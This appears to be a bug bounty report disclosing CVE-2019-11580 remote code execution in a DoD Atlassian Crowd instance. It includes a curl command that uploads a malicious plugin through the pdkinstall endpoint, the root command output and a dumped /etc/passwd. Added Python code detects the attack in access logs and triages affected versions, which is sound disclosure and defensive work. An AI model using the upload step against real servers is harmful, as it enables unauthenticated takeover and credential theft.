CVSS3: 9.8 Critical
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.975 (percentile 100.0%)
Summary:
Atlassian Crowd is a centralized identity management application that allows companies to "Manage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location."
A DOD installation is vulnerable to remote code execution because CVE-2019-11580 has not been patched.
Description:
From Atlassian's public advisory:
> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.
There is no public proof-of-concept for this vulnerability; however, I spent a good amount of time reverse-engineering the "pdkinstall" plugin and was able to successfully construct a working exploit.
cd into the directory containing rce.jar and run:

curl -k -H "Content-Type: multipart/content" \
  --form "file_cdl=@rce.jar;type=application/octet-stream" https://███/crowd/admin/uploadplugin.action
You'll see that the malicious plugin is successfully installed:
Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar
Now visit https://███████/crowd/plugins/servlet/hackerone-cdl, which invokes my malicious plugin. This executes the command whoami, which returns the user root:
██████████
Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
████████x:6:0:██████████/sbin:/sbin/shutdown
██████x:7:0:███████/sbin:/sbin/halt
█████████x:8:12:█████/var/spool/████/sbin/nologin
███x:10:14:███/var/spool/███████/sbin/nologin
██████x:11:0:██████/root:/sbin/nologin
██████████x:12:100:███████/usr/████/sbin/nologin
██████████x:13:30:█████/var/█████/sbin/nologin
████x:14:50:FTP User:/var/███████/sbin/nologin
█████████x:99:99:Nobody:/:/sbin/nologin
██████████x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
██████████x:38:38::/etc/██████/sbin/nologin
██████████x:499:76:"Saslauthd user":/var/empty/██████████/sbin/nologin
██████████x:47:47::/var/spool/mqueue:/sbin/nologin
███████x:51:51::/var/spool/mqueue:/sbin/nologin
████████x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
█████x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
████████x:74:74:Privilege-separated SSH:/var/empty/████████/sbin/nologin
████████x:81:81:System message bus:/:/sbin/nologin
███████x:500:500:EC2 Default User:/home/████████/bin/bash
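The two requests in the chain above (a POST to the pdkinstall upload action, then a hit on the newly installed plugin's servlet) are what a defender can look for in the Tomcat access log. The following is an added example of that detection logic, not code from the report or from Atlassian: it assumes Tomcat's "combined" access-log format, uses a constructed set of sample lines, and treats a 2xx upload followed by a request to /crowd/plugins/servlet/ from the same client within a short window as the strongest signal that the chain worked.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoints named in the report: the pdkinstall upload action and the path
# prefix under which an installed plugin's servlet is reached.
UPLOAD_PATH = "/crowd/admin/uploadplugin.action"
SERVLET_PREFIX = "/crowd/plugins/servlet/"

# Tomcat "combined" access-log format (assumed; adjust to your AccessLogValve pattern).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample lines for this example; they are not from the report.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - admin [10/Jun/2019:14:02:11 +0000] "GET /crowd/console/login.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jun/2019:14:05:43 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 200 412 "-" "curl/7.64.0"',
    '203.0.113.7 - - [10/Jun/2019:14:05:51 +0000] "GET /crowd/plugins/servlet/hackerone-cdl HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jun/2019:15:30:00 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 0 "-" "python-requests/2.21.0"',
    '10.0.0.9 - - [10/Jun/2019:16:00:00 +0000] "GET /crowd/plugins/servlet/ssoproxy HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def parse_access_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore the query string when matching paths
    return rec


def find_plugin_upload_chains(lines, window=timedelta(minutes=10)):
    """Return one finding per POST to the pdkinstall upload action.

    Each finding is (ip, upload_time, upload_status, servlet_paths), where
    servlet_paths are the plugin-servlet paths the same client requested within
    `window` after the upload.  Every POST to this endpoint deserves an alert:
    it is a development-only feature that should never be reachable in
    production, so even a 404 records an attempt.
    """
    uploads = defaultdict(list)
    servlet_hits = defaultdict(list)
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_PATH:
            uploads[rec["ip"]].append(rec)
        elif rec["path"].startswith(SERVLET_PREFIX):
            servlet_hits[rec["ip"]].append(rec)

    findings = []
    for ip, ups in uploads.items():
        for up in ups:
            later = [h["path"] for h in servlet_hits[ip]
                     if up["ts"] <= h["ts"] <= up["ts"] + window]
            findings.append((ip, up["ts"], up["status"], later))
    return findings


def likely_successful(finding):
    """True when the upload got a 2xx and the same client then reached a plugin servlet."""
    _ip, _ts, status, servlet_paths = finding
    return 200 <= status < 300 and bool(servlet_paths)


if __name__ == "__main__":
    for f in find_plugin_upload_chains(SAMPLE_ACCESS_LOG):
        verdict = "EXPLOITED" if likely_successful(f) else "attempt"
        print(f"{verdict}: {f[0]} at {f[1]:%Y-%m-%d %H:%M:%S} status={f[2]} servlets={f[3]}")
```

Run it against the real access log by feeding the file's lines to find_plugin_upload_chains. A legitimate administrator never touches uploadplugin.action, so the upload POST alone is a high-fidelity indicator; the servlet correlation only ranks which attempts to investigate first. If your Tomcat valve pattern differs from the combined format, only ACCESS_RE and TS_FMT need changing.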
Affected versions:
Crowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)
Crowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)
Crowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)
Crowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)
Crowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)
I recommend updating to the latest version of Atlassian Crowd, but if that's not possible, follow the mitigation options in the advisory.
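The version ranges above are half-open (first affected release up to, but not including, the fix release), and the 2.x ranges all fold into the first line. The following is an added example, not code from the report or from Atlassian, that encodes those ranges so an inventory of Crowd instances can be triaged mechanically; the handling of pre-release suffixes such as "3.0.5-RC1" (treated as still affected, because the fix is only trusted from the final release) is an assumption made here.

```python
# Affected ranges as listed in the advisory text above: a version v is affected
# when first_affected <= v < first_fixed.  Versions are 4-tuples; the fourth
# element is 0 for a release and -1 for a pre-release, so "3.0.5-RC1" sorts
# just below 3.0.5 and is still counted as affected (an assumption made here).
AFFECTED_RANGES = [
    ((2, 1, 0, 0), (3, 0, 5, 0)),
    ((3, 1, 0, 0), (3, 1, 6, 0)),
    ((3, 2, 0, 0), (3, 2, 8, 0)),
    ((3, 3, 0, 0), (3, 3, 5, 0)),
    ((3, 4, 0, 0), (3, 4, 4, 0)),
]


def parse_version(text):
    """'3.2.7' -> (3, 2, 7, 0); '3.0.5-RC1' -> (3, 0, 5, -1); '3.4' -> (3, 4, 0, 0)."""
    core, sep, _suffix = text.strip().partition("-")
    parts = [int(p) for p in core.split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unrecognised Crowd version: {text!r}")
    parts += [0] * (3 - len(parts))
    return (*parts, -1 if sep else 0)


def is_affected(version):
    """True when the version string falls inside one of the advisory's ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def fixed_version_for(version):
    """Return the advisory's fix release for the branch `version` is on, or None if not affected."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi[:3])
    return None


def triage(versions):
    """Map each observed version string to its fix release (None = not in an affected range)."""
    return {v: fixed_version_for(v) for v in versions}


if __name__ == "__main__":
    # Constructed inventory for the example, not from the report.
    for v, fix in triage(["2.8.3", "3.0.4", "3.0.5", "3.0.5-RC1", "3.2.7", "3.4.4", "3.5.0"]).items():
        print(f"{v:10} {'upgrade to ' + fix if fix else 'not in an affected range'}")
```

A None result means the version is outside the listed ranges, not that the instance is safe: versions older than 2.1.0 are simply unsupported and should be upgraded anyway, and the check says nothing about whether the advisory's mitigation (removing the pdkinstall plugin) was applied to an otherwise vulnerable build.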
Impact:
Remote code execution on https://███. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an identity management / single sign-on application, an attacker could exploit this vulnerability to gain access to any application that uses Crowd for sign-on.
Since this is running as root, an attacker could also easily backdoor the login page and steal credentials.
Thanks,
Corben Leo (@cdl)